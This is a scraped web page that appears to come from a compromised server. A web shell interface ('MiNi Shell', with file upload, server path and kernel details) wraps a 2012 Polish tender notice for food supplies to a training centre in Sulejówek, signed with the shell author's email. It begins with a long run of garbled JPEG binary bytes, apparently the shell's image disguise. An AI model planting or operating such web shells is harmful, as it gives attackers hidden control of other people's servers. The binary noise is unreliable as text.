JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121026/420186-N-2012.html

<p class="kh_header"><b>Warszawa: Sukcesywna dostawa artykułów spożywczych na potrzeby Centrum Szkoleniowego 
w Sulejówku.</b><br>
<b>Numer ogłoszenia: 420186 - 2012; data zamieszczenia: 26.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Rozwoju Edukacji , Al. Ujazdowskie 28, 00-478 Warszawa, woj. mazowieckie, tel. 22 345 37 00, faks 22 345 37 70.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ore.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Oświata.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa artykułów spożywczych na potrzeby Centrum Szkoleniowego 
w Sulejówku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sukcesywna dostawa artykułów spożywczych na potrzeby Centrum Szkoleniowego w Sulejówku.
Przedmiot zamówienia został podzielony na następujące części:
Część 1 - warzywa i owoce
Część 2 - mleko i wyroby mleczarskie
Część 3 - pieczywo i ciasto
Część 4 - kawa, herbata, napoje 
Część 5 - jaja 
Część 6 - różne art. spożywcze: konserwy, cukier, przyprawy, mrożonki, mączne.

Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 (a,b,c,d,e,f) do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 15.50.00.00-3, 15.81.10.00-6, 15.86.00.00-4, 03.14.25.00-3, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie niezbędnym do wykazania spełniania tego warunku, Zamawiający wymaga aby Wykonawca posiadał świadectwo o wdrożonym systemie HACCP,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a)W przypadku wprowadzenia przez producenta innej gramatury niż określona w ofercie Wykonawcy, Zamawiający dopuszcza w czasie trwania umowy zmianę gramatury produktów - po uzgodnieniu i akceptacji przez Zamawiającego. Ceny jednostkowe produktów o zmienionej gramaturze zostaną przeliczone proporcjonalnie do cen podanych w ofercie Wykonawcy.
b)W uzasadnionych przypadkach dotyczących: wstrzymania, zaprzestania produkcji, wycofania z rynku, Zamawiający przewiduje możliwość zmiany umowy w zakresie oferowanego asortymentu z zastrzeżeniem, iż oferowany zamiennik musi odpowiadać parametrom co najmniej takim jak oferowany produkt z gwarancją zachowania ceny nie wyższej niż podanej w ofercie za  zmieniony produkt.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ore.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Rozwoju Edukacji
Aleje Ujazdowskie 28, 
00-478 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.11.2012 godzina 10:00, miejsce: Ośrodek Rozwoju Edukacji
Aleje Ujazdowskie 28, 
00-478 Warszawa 
pokój 102.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> lp.	nazwa towaru	jedn. miary	przewidywana ilość
1	cytryny	kg	15
2	jabłka	kg	50
3	pomarańcze	kg	10
4	banan	kg	10
5	grapefruit	kg	10
6	winogrona	kg	1,8
7	mandarynki	kg	10
8	botwina	szt	9
9	brokuły	szt	20
10	buraki czerwone	kg	80
11	cebula 	kg	50
12	cebula czerwona	kg	20
13	cebula dymka	szt	10
14	cukinia	kg	50
15	czosnek	szt	40
16	fasola szparagowa	kg	25
17	groch	kg	10
18	kalafior	szt	20
19	kapusta biała	kg	60
20	kapusta biała	szt	73
21	kapusta czerwona	kg	50
22	kapusta kwaszona	kg	80
23	por	kg	50
24	kapusta pekińska	kg	50
25	kapusta włoska	kg	15
26	kapusta włoska	szt	25
27	koperek	szt	150
28	marchew	kg	150
29	natka pietruszki	szt	150
30	ogórek świeży	kg	89
31	ogórki kwaszone	kg	50
32	ogórki małosolne	kg	30
33	papryka czerwona	kg	40
34	pieczarki	kg	60
35	pietruszka	kg	50
36	pomidory	kg	150
37	por	szt	150
38	rzodkiewka	szt	50
39	sałata lodowa	szt	70
40	sałata masłowa	szt	80
41	seler	kg	80
42	seler naciowy	szt	10
43	seler	szt	38
44	szczypior	szt	80
45	włoszczyzna	szt	5
46	ziemniaki	kg	900
47	ziemniaki młode	kg	30
48	brukselka	kg	30
49	bakłażan	kg	40
50	sałata karbowana	szt	4
51	sałata rossa	szt	6
52	fasola łuskana	kg	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 03.22.10.00-6, 03.22.23.00-6, 03.22.21.10-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> mleko i wyroby mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> lp.	nazwa towaru	j.m	przewidywana ilość
1	jogurt naturalny mały 150 g	szt.	20
2	jogurt owocowy Jogobella mały 150 g lub równoważny	szt.	10
3	masło ekstra w kostce - 200g	szt.	20
4	masło extra procjowane - 10-15g	szt.	2000
5	masło roślinne- 250 g	szt.	40
6	mleko karton 2% - 1 l	szt.	100
7	ser biały tłusty	kg	60
8	ser feta- 270 g	szt.	30
9	ser mozzarella kulki - 200g	szt.	3
10	Ser parmezan - 200g	szt.	5
11	ser pleśniowy - lazur-150g	szt.	5
12	ser pleśniowy brie	kg	5
13	Ser pleśniowy valbon 	kg	2
14	Ser żółty - rolada ustrzycka	szt.	30
15	ser żółty Gouda	kg	30
16	Ser żółty wędzony	kg	3
17	serek topiony  100g *8	szt.	80
18	serek waniliowy	szt.	10
19	śmietana 30% - 1l	szt.	30
20	śmietana  36% , o.5 l	szt.	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.51.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pieczywo i ciasto.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> lp.	nazwa towaru	jedn.miary	przewidywana ilość
1	bułka ciabata mała	szt.	50
2	bułka kajzerka mała	szt.	2000
3	bułka kajzerka duża	szt.	500
4	bułka paryska	szt.	19
5	bułka sojowa	szt.	50
6	bułka sznytka	szt.	200
7	bułki sojowe	szt.	25
8	bułki śniadaniowe	szt.	50
9	bułki dyniowe	szt.	50
10	bułki bankietowe	szt.	300
11	chleb baltonowski duży	szt.	150
12	chleb razowy	szt.	40
13	chleb tostowy	szt.	13
14	chleb Eko	szt.	20
15	chleb z domowy	szt.	13
16	chleb ze słonecznikiem	szt.	200
17	ciastka - ptysie mini	kg	2
18	ciastka babeczki	szt.	30
19	ciastka baletki	kg	30
20	ciastka kokosowe	kg	30
21	ciastka koperty	kg	30
22	ciastka kruche	kg	30
23	ciastka małe pączki	kg	30
24	ciastka kwiatuszki	kg	4
25	ciastka orzechowe	kg	12
26	ciastka serniczki	szt.	30
27	ciastka szarlotka	szt.	30
28	ciastko W-Z	szt.	30
29	cistaka szachownica	kg	20
30	ciastka deser makowy	szt.	30
31	ciastko drożdżówka z serem	szt.	30
32	ciastka francuskie z tofii	kg	15
33	ciastka deser owocowy	szt.	30
34	ciastka francuskie z budyniem	kg	30
35	ciastka francuskie z czekoladą	kg	10
36	ciastka jagodzianki	szt.	30
37	ciastka morelowe	kg	2
38	ciasto makowiec	szt.	3,5
39	ciastka łapa niedźwiedzia	szt.	10
40	ciastka owocowy raj	szt.	35
41	ciastka pączki	szt.	20
42	ciastka pączki z jagodami	szt.	25
43	ciastka krajanka	kg	2
44	ciastka rogaliki kruche	kg	3
45	ciastka rogaliki maślane	kg	7
46	ciastka rożki francuskie	kg	10
47	ciastka słomka ptysiowa	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 15.81.22.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> kawa, herbata, napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> lp.	nazwa towaru	jm	przewidywana ilość
1	herbata ekspresowa czarna - 25 bag	szt.	30
2	herbata ekspresowa czarna -50 bag	szt.	50
3	herbata ekspresowa smakowa -25 torebek 	szt.	14
4	herbata ekspresowa zielona- 25 torebek	szt.	5
5	kawa rozpuszczalna -50 g	szt.	20
6	kawa ziarnista mielona - 80g	szt.	500
7	sok jabłkowy - karton 1 l	szt.	30
8	sok pomarańczowy - karton 1 l.	szt.	30
9	woda mineralna niegazowana aro lub równoważny - 6 l	szt.	30
10	woda mineralna niegazowana cisowianka lub równoważny- 0,5l	szt.	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.86.00.00-4, 15.98.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> lp.	nazwa towaru	jedn. miary	przewidywana ilość
1	jaja	szt.	1000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> różne art. spożywcze: konserwy, cukier, przyprawy, mrożonki, mączne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> lp.	nazwa towaru	jm	przewidywana ilość
1	barszcz biały torebki	szt.	5
2	bułka tarta- 450g	szt.	30
3	chrzan w słoiku  Rolnik lub równoważny 290g	szt.	20
4	cukier kryształ Aro lub równoważny  1000g	kg	50
5	cukier waniliowy Cykoria lub równoważny 32 g	szt.	40
6	dżem mini -Tymbark lub równoważny 25g	szt.	100
7	grzyby suszone Aro lub równoważny 20g	szt.	15
8	kasza gryczana 900 g	kg	20
9	kasza jęczmienna Cenos lub równoważny 500g	kg	10
10	kasza pęczak 450g	kg	10
11	ketchup pikantny- 1g Kotlin lub równoważny	szt.	10
12	ketchup porcjowany w saszetkach Hellmans lub równoważny 15 ml	szt.	10
13	kon ananas kawałki w puszcze  Aro lub równoważny 340 g	szt.	30
14	kon brzoskwinie połowki w puszcze Aro lub równoważne 465,g	szt.	15
15	kon fasolka biała w puszce Dawtona lub równoważny 400g	szt.	10
16	kon fasolka czerwona w puszce Dawtona lub równoważny 400 g	szt.	20
17	kon groszek  Rolnik lub równoważny 400 g	szt.	20
18	kon kapary Goya lub równoważny 100g	szt.	16
19	kon kukurydza  Rolnik lub równoważne 340g	szt.	50
20	kon ogórki  Krokus lub rownoważne 900 ml	szt.	10
21	kon oliwki czarne w zalewie  Bakaland lub równoważne 900 ml	szt.	10
22	kon papryka 1700 ml	szt.	10
23	kon pieprz w zalewie Goya lub równoważny 100 g	szt.	4
24	kon pomidory krojone w puszce Dawtona lub równoważne 400 g	szt.	50
25	kon pomidory suszone w zalewie Pugliese lub rownowazne 290g	szt.	30
26	kon sałatka szwedzka  Urbanek lub równoważna 	szt.	10
27	kon seler krojony  Rolnik lub równoważny 1700ml	szt.	10
28	kon tuńczyk w puszce w sosie własnym	szt.	5
29	koncentrat pomidorowy Pudliszki lub równoważny 200g	szt.	50
30	konserwowy szczaw Urbanek lub równoważny 350 g	szt.	20
31	majonez Kielecki lub równowazny 310 ml	szt.	50
32	makaron łazanki Lubella lub rownoważny 500g	szt.	10
33	makaron nitki Knor lub równoważny 2500 g	kg	5
34	makaron penne Knor lub równoważny 3000g	szt.	5
35	makaron spagetti Lubella lub rownowazny 500g	szt.	5
36	makaron świderki Lubella lub równoważny 500g	szt.	10
37	makaron zacierki Gdiard lub równoważny 250g	szt.	20
38	mąka szymanowska 1000g	kg	40
39	mąka ziemniaczana 500g	kg	5
40	mrożona fasola szparagowa zielona 2500 g	szt.	5
41	mrożona marchewka kostka 2500 g	szt.	5
42	mrożona merchewka baby Horeca lub równoważna 2500g	szt.	5
43	mrożona mieszanka chińska 2500 g	szt.	5
44	mrożona porzeczka 2500g	szt.	5
45	mrożone jarzyny 2500g	szt.	5
46	mrożony brokuł 2500g	szt.	5
47	mrożony kalafior 2500 g	szt.	5
48	mrożony kompot wielowocowy 2500 g	szt.	8
49	musztarda Kamis lub równowazna 180g	szt.	10
50	ocet balsamico 500ml	szt.	5
51	olej słonecznikowy Bartek lub równoważny- 1l	szt.	30
52	oliwa z oliwek- 900ml	szt.	5
53	płatki kukurydziane Nestle lub równoważne 250g	szt.	10
54	przyprawa bazylia-10g	szt.	2
55	przyprawa do kurczaka-10g	szt.	20
56	przyprawa do mięsa-10g	szt.	20
57	przyprawa do zup w butelce 210g	szt.	20
58	przyprawa estragon-10g	szt.	15
59	przyprawa kardamon - 10g	szt.	19
60	przyprawa kostki rosołowe drobiowe 120g	szt.	10
61	przyprawa kostki rosołowe wołowe 120g	szt.	10
62	przyprawa kurkuma-10g	szt.	5
63	przyprawa kwasek cytrynowy-10g	szt.	20
64	przyprawa liść laurowy-10g	szt.	20
65	przyprawa majeranek-10g	szt.	20
66	przyprawa mięta w doniczce	szt.	2
67	przyprawa oregano-10g	szt.	20
68	przyprawa papryka słodka-10g	szt.	20
69	przyprawa pestki dyni łuskane 100g	szt.	10
70	przyprawa pieprz czarny mielony-1000g	szt.	2
71	przyprawa pieprz czarny w ziarnach-10g	szt.	10
72	przyprawa rozmaryn - 10g	szt.	10
73	przyprawa tymianek - 10g	szt.	10
74	przyprawa warzywna kucharek -1 kg	szt.	10
75	przyprawa zaprawa cytrynowa w butelkach 250ml	szt.	1
76	przyprawa ziele angielskie-10g	szt.	10
77	przyprawa zioła prowansalskie-10g	szt.	10
78	przyprawy chińszczyzna 10g	szt.	5
79	przyprawy curry-10g	szt.	5
80	przyprawy cynamon 10g	szt.	10
81	przyprawy imbir 10g	szt.	10
82	przyprawy migdały Aro lub równoważne 100g	szt.	10
83	przyprawy morele suszone Aro lub równoważne 100g	szt.	10
84	przyprawy pestki słonecznika łuskanego Aro lub równoważne 100g	szt.	10
85	przyprawy rodzynki Aro lub równoważne 100g	szt.	10
86	przyprawy śliwki suszone Aro lub równoważne 100g	szt.	10
87	ryż biały Sonko lub równoważny 1000g	kg	10
88	sojowe kotlety  Sante lub równoważne 100g	szt.	5
89	sojowy pasztet  Sonte lub równoważny 113 g	szt.	10
90	sos sojowy w butelce 623 ml	szt.	6
91	sól jodowana 1000g	kg	20
92	pierogi	kg	2
93	mrożony szpinak	szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.83.10.00-2, 15.85.10.00-8, 15.33.11.70-9, 15.87.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com